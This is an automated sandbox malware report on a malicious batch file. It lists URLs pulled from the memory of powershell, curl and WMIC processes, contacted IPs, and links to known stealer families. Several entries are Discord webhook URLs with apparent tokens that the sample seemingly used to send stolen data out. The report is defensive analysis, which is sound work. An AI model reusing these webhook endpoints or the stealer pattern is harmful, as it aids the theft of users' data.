                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000017.00000003.2304007048.0000000009148000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzcurl.exe, 0000001C.00000002.2290720682.00000219E6A60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2287844080.00000219E6780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2673504080.000002D2E0716000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://ptb.discord.com/api/webhooks/12918514powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ptb.discord.com/api/webhooks/1powershell.exe, 00000015.00000002.2166099676.0000025C19944000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://oneget.orgXpowershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/09/enumerasvchost.exe, 00000019.00000002.2704265023.000001774DCC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.msn.com/Io.explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.msn.com/uoexplorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1Uipowershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://go.micropowershell.exe, 00000009.00000002.1496227351.00000269942A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A44B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://contoso.com/Iconpowershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://crl.ver)svchost.exe, 00000019.00000002.2704857982.000001774DCCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000019.00000003.2260956832.000001774F0B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.microsoft.powershell.exe, 00000015.00000002.2222057483.0000025C336DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://powerpoint.office.comexplorer.exe, 00000017.00000003.2305006917.00000000091E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.00000000091E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRpowershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://ptb.discordpowershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0beWMIC.exe, 00000004.00000002.1453877128.0000022707420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000019.00000003.2260956832.000001774F121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://api.msn.com/v1/news/Feed/Windows?Vmexplorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://crl.mpowershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-fexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.microsoft.cotexplorer.exe, 00000017.00000003.2339756407.000000000BC47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://aka.ms/pscore68powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B59A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://discord.com/api/webhooks/1292044762974785547/-sVDk3powershell.exe, 00000009.00000002.1493410501.0000026991744000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://oneget.orgpowershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        162.159.137.232
                                                                                                        		discord.comUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        162.159.128.233
                                                                                                        		ptb.discord.comUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        185.199.108.153
                                                                                                        		diva.inkNetherlands
                                                                                                        		54113FASTLYUStrue

                                                                                                        Private

                                                                                                        IP
                                                                                                        127.0.0.1

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1526626
                                                                                                        Start date and time:2024-10-06 13:35:07 +02:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 8m 20s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:45
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:main.bat.bin.bat
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.expl.evad.winBAT@46/42@5/4
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 28.6%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 91%
                                                                                                        • Number of executed functions: 29
                                                                                                        • Number of non-executed functions: 0
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .bat

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, audiodg.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 93.184.221.240, 52.165.164.15, 13.85.23.206, 4.245.163.56, 204.79.197.203, 184.28.90.27, 2.23.209.133, 2.23.209.179, 2.23.209.130, 2.23.209.140, 2.23.209.189, 2.23.209.185, 2.23.209.182, 2.23.209.187, 2.23.209.149, 2.23.209.148, 2.23.209.177, 2.23.209.176
                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, r.bing.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1372 because it is empty
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1440 because it is empty
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3272 because it is empty
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 4424 because it is empty
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6168 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        07:36:06API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                        07:36:09API Interceptor93x Sleep call for process: powershell.exe modified
                                                                                                        07:37:26API Interceptor321x Sleep call for process: explorer.exe modified
                                                                                                        07:37:27API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        162.159.137.232Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                          https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                                                                            http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                              SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                                                                https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                                                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse
                                                                                                                    SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse
                                                                                                                      ied6tTdm.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        https://clicker.extremelyorange.com/Get hashmaliciousUnknownBrowse
                                                                                                                          https://hkdiscord.antsoon.com/Get hashmaliciousUnknownBrowse
                                                                                                                            162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                            • discord.com/phpMyAdmin/
                                                                                                                            185.199.108.153http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                                                                                                            • detection.fyi/
                                                                                                                            http://sahalnp.github.io/Facebook_clone/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • sahalnp.github.io/Facebook_clone/
                                                                                                                            http://docs-trezor-cdn.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • docs-trezor-cdn.github.io/
                                                                                                                            http://pixlo8d.github.io/instagram-login-cloneGet hashmaliciousUnknownBrowse
                                                                                                                            • pixlo8d.github.io/instagram-login-clone
                                                                                                                            http://gopuaakash.github.io/facebook/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • gopuaakash.github.io/facebook/
                                                                                                                            http://servl-lnt.github.io/ap/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • servl-lnt.github.io/ap/
                                                                                                                            http://propertyinaustralia.github.io/propertyinaustralia/property.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • propertyinaustralia.github.io/propertyinaustralia/property.html
                                                                                                                            http://aaliyan-ahmed08.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • aaliyan-ahmed08.github.io/netflix-clone
                                                                                                                            http://innocent321.github.io/Netflix-HubGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • innocent321.github.io/Netflix-Hub
                                                                                                                            http://shantanu-deshmane.github.io/Netflix-loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • shantanu-deshmane.github.io/Netflix-login

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            discord.comSolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 162.159.135.232
                                                                                                                            https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.135.232
                                                                                                                            HyZh4pn0RF.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            https://bafybeih5zpu7rzaoeodorqhminsbsmv3eswg6px7qixdtiwflfle6cv364.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
                                                                                                                            https://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            bg.microsoft.map.fastly.nethttp://pub-840f88e3288a4f17b5efba5dbcc493d8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            https://pub-e3974f4c00f54fc28eadd63f1eacad4a.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            http://pub-0c062afe82544962aee957f640f2ca2d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            http://pub-6906da2464104cdc84bd9a9fa52dde76.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            http://pub-30984890657744baad27fb8faa5b5cc9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            https://free-5464198.webadorsite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            http://distrosourcess8.sg-host.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.210.172
                                                                                                                            https://maliyedavasorgu.org/sorguGet hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            http://d2qqkq2ozhynzf.cloudfront.net/Get hashmaliciousUnknownBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            https://token-portaldapp.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 199.232.214.172
                                                                                                                            ptb.discord.comTMPN.exeGet hashmaliciousSkuld StealerBrowse
                                                                                                                            • 162.159.128.233
                                                                                                                            zamPeEkHWr.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            IDLBk4XMUa.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                            • 162.159.138.232
                                                                                                                            golang-modules.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.136.232
                                                                                                                            golang-modules.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.137.232
